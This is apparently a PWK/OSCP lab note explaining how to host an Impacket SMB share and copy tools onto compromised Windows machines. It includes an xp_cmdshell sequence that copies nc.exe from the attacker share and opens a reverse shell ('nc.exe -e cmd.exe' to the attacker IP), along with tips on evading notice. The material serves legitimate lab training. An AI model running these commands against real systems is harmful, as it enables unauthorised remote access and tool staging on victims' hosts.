PWK Notes: Post-Exploitation Windows File Transfers with SMB
Moving files to and from a compromised Linux machine is, in general, pretty easy. You’ve got nc, wget, curl, and if you get really desperate, base64 copy and paste. Windows, is another issue all together. PowerShell makes this somewhat easier, but for a lot of the PWK labs, the systems are too old to have PowerShell. The course material goes over a few ways to achieve this, but they don’t cover my favorite - SMB. This may be less realistic in an environment where you have to connect from a victim machine back to your attacker box over the public internet (where SMB could be blocked), but for environments like PWK labs and HTB where you are vpned into the same LAN as your targets, it works great.
Overview
The goal here is to get easy file transfer to and from a compromised Windows host. To do this, we’ll create an SMB share on our local box, and then connect to that share from the compromised Windows host. From there, we can copy files into the shared folder on either host, and then access them on the other host.
Server
Installation
The Impacket tool set comes pre-installed on Kali. If you don’t have it for some reason, you can install it with apt install python-impacket. You can also clone the Secure Auth Corp Impacket git repo if you want the most up to date version.
Starting the Server
To get the server up and running on our local box, simple enter the following syntax:
# impacket-smbserver.py shareName sharePath
shareName- can be anything you want, but you’ll need to know this in order to connect back to the sharesharePath- the folder you want shared
Example
For example, I keep a tools directory with a bunch of common stuff I might need as I work though my labs:
root@kali# ls tools/
25912.exe cachedump.exe lonelypotato.exe ms11-046.exe MS14-002.exe MS14-070.exe nc.exe PwDump.exe wce32.exe windows-privesc-check2.exe
37049-32.exe ff.exe mimikatz MS11-046.exe MS14-070 MS14-070.rar plink.exe rottenpotato.exe wce64.exe winx86_meterpreter_80.exe
accesschk-2003-xp.exe fgdump.exe mimikatz.exe MS13-053.exe MS14-070_adduser nc64.exe Privesc sysinternals whoami.exe winx86_stageless_shell_80.exe
Others like to create an smb directory for each target and drop the necessary files into it.
Then I can share this directory as follows:
root@kali# impacket-smbserver smb tools/
Impacket v0.9.18-dev - Copyright 2002-2018 Core Security Technologies
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
Client
Syntax
From the Windows host, we need to use the build in net use command to connect to our shared drive. Here’s three examples of the syntax:
C:\>net use
C:\>net use \\[host]\[share name]
C:\>net use /d \\[host]\[share name]
The first command will list all currently connected shares. The second will create a connection to the named shared at the given host (in our case, typically an IP address). The third command will close that connection.
Once that runs, you can reference the share by it’s full UNC path.
Examples
With Shell
Let’s say we wanted to copy a privesc binary to the host. We could do the following.
Connect to the share:
C:\>net use \\10.11.0.XXX\smb
net use \\10.11.0.XXX\smb
The command completed successfully.
Copy the file:
C:\WINDOWS\Temp>copy \\10.11.0.XXX\smb\ms11-046.exe \windows\temp\a.exe
copy \\10.11.0.XXX\smb\ms11-046.exe \windows\temp\a.exe
1 file(s) copied.
To Get Shell From RCE
In a different case, I only had access to a MySQL database, and wanted to get a full shell. I used xp_cmdshell to map my drive, copy nc to the host, and run it:
1> xp_cmdshell 'net use \\10.11.0.XXX\smb'
2> go
output
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
The command completed successfully.
NULL
NULL
(return status = 0)
1> xp_cmdshell 'copy \\10.11.0.XXX\smb\nc.exe \windows\temp\nc.exe'
2> go
output
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
1 file(s) copied.
NULL
(return status = 0)
1> xp_cmdshell '\windows\temp\nc.exe -e cmd.exe 10.11.0.XXX 443'
2> go
Opsec Notes
Locally
When you run this server, you’ve created an unauthenticated share on the network that anyone can read and write to. That’s why it’s important not to share anything sensitive (like your notes directory), as someone could mess with or delete them.
It’s also a good idea to take down the share when you’re not using it.
You will be able to tell when a new host connects to your share, and when they disconnect:
[*] Incoming connection (10.11.1.X,3187)
[*] AUTHENTICATE_MESSAGE (\,USERNAME)
[*] User \USERNAME authenticated successfully
[*] :::00::4141414141414141
[*] Closing down connection (10.11.1.5,3187)
[*] Remaining connections []
On Target
There is an option to net use to allow you to reference a connected share by a new drive letter. To do this, just run:
C:\>net use p: \\10.11.0.X\smb
From there, you can go to that drive and it’s easier to interact with. It’s also very unsafe opsec. A user on the box is unlikely to see a mapped share, but might very well notice a new drive letter. The same goes for others in the labs with you attacking the same box. It’s worth the extra trouble to just use the UNC path.